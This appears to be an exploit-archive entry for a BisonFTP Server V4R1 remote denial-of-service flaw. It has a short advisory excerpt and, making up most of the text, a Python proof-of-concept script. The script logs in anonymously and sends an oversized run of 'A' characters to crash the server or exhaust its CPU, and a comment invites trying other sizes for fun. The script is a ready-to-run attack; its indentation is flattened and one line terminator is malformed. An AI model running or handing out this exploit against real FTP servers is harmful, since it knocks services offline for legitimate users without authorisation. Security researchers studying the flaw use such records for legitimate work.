source: https://www.securityfocus.com/bid/14079/info
BisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users.
Reports indicate that the issue may be exploited only after successful authentication.
#!/usr/bin/python
#
# Vulnerability: Denial Of Service
# Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs
# When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash)
# NB: Sorry for Python purists, it's the first time that i use it ;)
import socket
import time
n = 1
t = 98192 #Try others, it's funny.
p = 21 # Set your port here.
ip = "192.168.0.1" # Set ip here.
boom = "PoC "+'\x41'*t
print "\n\nVulnerable product: BisonFTP Server V4R1"
print "Denial of Service vulnerability"
print "---------------------------------------------"
print "Discovered & coded by fRoGGz - SecuBox Labs\n"
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((ip,p))
d=s.recv(1024)
print "[+] " +d
print "[+] Utilisateur."
time.sleep(1)
s.send('USER Anonymous\r\n')
s.recv(512)
print "[+] Mot de passe."
time.sleep(1)
s.send('PASS Anonymous\r\n')
s.recv(512)
print "[+] Envoi malicieux.\n\nDoS termine !\n"
time.sleep(1)
s.send(boom+'r\n\n')
except:
print "[+] Machine indisponible, verifiez le port ou l'ip."
